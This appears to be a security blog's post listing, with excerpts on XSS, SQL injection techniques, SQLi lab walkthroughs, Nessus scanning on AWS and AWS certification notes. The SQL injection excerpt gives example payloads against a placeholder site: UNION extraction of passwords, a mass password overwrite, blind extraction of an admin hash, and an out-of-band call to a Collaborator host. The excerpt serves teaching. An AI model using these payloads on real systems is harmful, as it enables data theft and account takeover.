Cross-site scripting (XSS)

Cross-site scripting, known as XSS, is a web vulnerability in which malicious scripts are injected into benign and trusted websites. XSS occurs when an attacker sends malicious code through a user input field in a browser to a different end user.

Mechanisms
In an XSS attack the attacker injects a script into HTML code, so you'll have to know JavaScript and HTML syntax. The web uses scripts to control client-side application logic and make the website interactive; for example, this script generates a "Hello!" pop-up on the web page: ...

February 14, 2022 · 3 min · 484 words · Jesus Lujan

SQL Injection

A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application's database by supplying malicious input that is inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped, and it can lead to authentication bypass, sensitive data leaks, tampering with the database and, in some cases, RCE.

In-Band (classic) SQL Injection
Occurs when the attacker uses the same communication channel to both launch the attack and gather its result.
The retrieved data is presented directly in the web page.
Easier to exploit than the other categories of SQLi.

Error-Based SQLi
Error-based SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection.

www.random.com/app.php?id='
#output
#You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version...

Union-Based SQLi
An in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set.

Input:
# retrieving data from another table
http://www.random.com/app.php?id=' UNION SELECT username, password FROM users; --
# update all passwords from a table with POST method
http://www.random.com/app.php?new_password="password12345';--"
query = UPDATE Users SET Password='password12345';-- WHERE Id = 2;

The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table and change all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password.

Inferential (Blind) SQL Injection
An SQLi vulnerability where there is no actual transfer of data via the web app.
Just as dangerous as in-band SQLi.
The attacker is able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB server.
Takes longer to exploit than in-band SQL injection.

Boolean-based SQLi
Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.

www.random.com/app.php?id=1
select title from product where id=1
#Payload 1 (false)
www.random.com/app.php?id=1 and 1=2
select title from product where id=1 and 1=2
#Payload 2 (true)
www.random.com/app.php?id=1 and 1=1
select title from product where id=1 and 1=1

User table: Administrator / e3c3889ded99ej29dj9edjdje992
SUBSTRING(a,b,c): function that selects a part of a string; a: the string, b: the first position, c: how many chars

#Payload 1
www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'), 1, 1)='s'
#Query
select title from product where id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='s'
#result: nothing is returned because the condition is false
#Payload 2
www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='e'
#Query
select title from product where id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username='Administrator'),1,1)='e'
#result: returned true; the title of product id 1 is returned because "e" is the first character of the hashed password

Time-based Blind SQLi
Relies on the database pausing for a specified amount of time before returning the result, which indicates a successful SQL query execution.
Ex: if the first character of the administrator's hashed password is an "a", wait 10 seconds.

Out-of-band (OAST) SQLi
Consists of triggering an out-of-band network connection to a system that you control.
Not common; uses a variety of protocols (DNS, HTTP).

'; exec master..xp_dirtree '//434934839493499.burpcollabolator.net/a'--

Second order SQLi
Second order SQLi happens when an application's user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example, consider an app that registers a user by specifying a username and password, and the user submits the following request: ...

January 25, 2022 · 8 min · 1505 words · Jesus Lujan

SQL Injection - Labs

Lab 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
We need to retrieve hidden data, so we search for queries in the web page where we can inject SQL injection payloads. We can see that the request is filtering the data by category, and we are asked to show the hidden elements, so we assume that there is a parameter that hides the elements. We try the following payload, which will show the elements of all categories and comment out the rest of the query so that it does not filter by hidden or visible elements: ...

January 25, 2022 · 15 min · 3007 words · Jesus Lujan

Vulnerability Management with Nessus in AWS

Introduction
In this tutorial we will cover vulnerability scanning and vulnerability remediation, two of the main steps in the Vulnerability Management Lifecycle. We will be using Nessus Essentials to scan local VMs hosted on VMware Workstation, running credentialed scans to discover vulnerabilities and then remediating some of them.

EC2 Instance Setup
The first step is to launch an EC2 instance. The recommended requirements are:
Windows OS
basic: t3.medium
recommended: t3.xlarge
Decrypt your password to log in over an RDP session and use it to access your EC2 instance ...

January 20, 2022 · 3 min · 432 words · Jesus Lujan

AWS Certified Cloud Practitioner Notes

Cloud computing and IAM
Types of Cloud Computing

Infrastructure as a Service (IaaS)
Provides the building blocks for cloud IT
Provides networking, computers and data storage space
Highest level of flexibility
Simulates the look of managing physical resources
Eg: EC2, EBS, GCP, Digital Ocean, Elastic Load Balancing

Platform as a Service (PaaS)
Removes the need for the company to manage the underlying infrastructure
Focus on deployment and management of applications
You define the behavior and environment for your application (code)
Eg: Heroku, ECS, Elastic Beanstalk

Software as a Service (SaaS)
A complete product that is run and managed by the service provider
Offers services meant to be accessed by end users
Eg: Gmail, Outlook, Rekognition for ML, Zoom ...

January 16, 2022 · 48 min · 10012 words · Jesus Lujan